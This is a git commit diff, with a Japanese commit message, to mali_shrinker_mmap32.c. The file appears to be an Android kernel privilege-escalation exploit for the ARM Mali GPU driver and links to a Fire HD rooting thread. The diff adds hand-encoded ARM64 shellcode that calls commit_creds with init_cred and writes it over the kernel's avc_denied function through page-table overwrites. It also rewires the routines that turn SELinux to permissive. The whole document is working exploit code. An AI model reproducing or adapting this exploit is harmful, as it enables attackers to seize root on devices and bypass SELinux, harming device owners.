Baiker000氏の変更を反映

https://xdaforums.com/t/potential-arm-mali-gpu-based-root-firehd-8th-12th-gen-affected.4574635/post-89496554

Signed-off-by: yuu <[email protected]>

mali_shrinker_mmap32.c

@@ -91,6 +91,7 @@ Overwriting SELinux to permissive
 static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
 
 static uint32_t root_code[8] = {0};
+static uint32_t root_code2[8]={0};
 static uint32_t root_code_un[8] = {0};
 
 static uint8_t jit_id = 1;
@@ -469,15 +470,15 @@ void fixup_root_shell2(uint64_t init_cred, uint64_t commit_cred, uint64_t avc_de
     printf("Run fixup_root_shell2\n");
     uint32_t init_adpr = write_adrp(0, avc_deny, init_cred);
     // Sets x0 to init_cred
-    root_code[ADRP_INIT_INDEX] = init_adpr;
-    root_code[ADD_INIT_INDEX] = add_init;
+    root_code2[ADRP_INIT_INDEX] = init_adpr;
+    root_code2[ADD_INIT_INDEX] = add_init;
     // Sets x8 to commit_creds
-    root_code[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred);
-    root_code[ADD_COMMIT_INDEX] = add_commit;
-    root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
-    root_code[5] = 0xd63f0100; // blr x8
-    root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
-    root_code[7] = 0xd65f03c0; // ret
+    root_code2[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred);
+    root_code2[ADD_COMMIT_INDEX] = add_commit;
+    root_code2[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+    root_code2[5] = 0xd63f0100; // blr x8
+    root_code2[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+    root_code2[7] = 0xd65f03c0; // ret
     printf("End fixup_root_shell2\n");
 }
 
@@ -690,33 +691,15 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
   //Go through the reserve pages addresses to write to avc_denied with our own shellcode
   write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
-/*for onyx
 void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
 
- uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
-  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-
-  usleep(100000);
-  
-  //Call commit_creds to overwrite process credentials to gain root
-  write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t));
-//  write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-//    write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-}
-*/
-//original code(avc_deny)
-void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
-  /* Skip this
   uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
   usleep(100000);
   //Go through the reserve pages addresses to write to avc_denied with our own shellcode
-  write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
+  write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code2[0]), sizeof(root_code2)/sizeof(uint32_t));
 
-  //Triggers avc_denied to disable SELinux
-  open("/dev/kmsg", O_RDONLY);
-  */
   uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);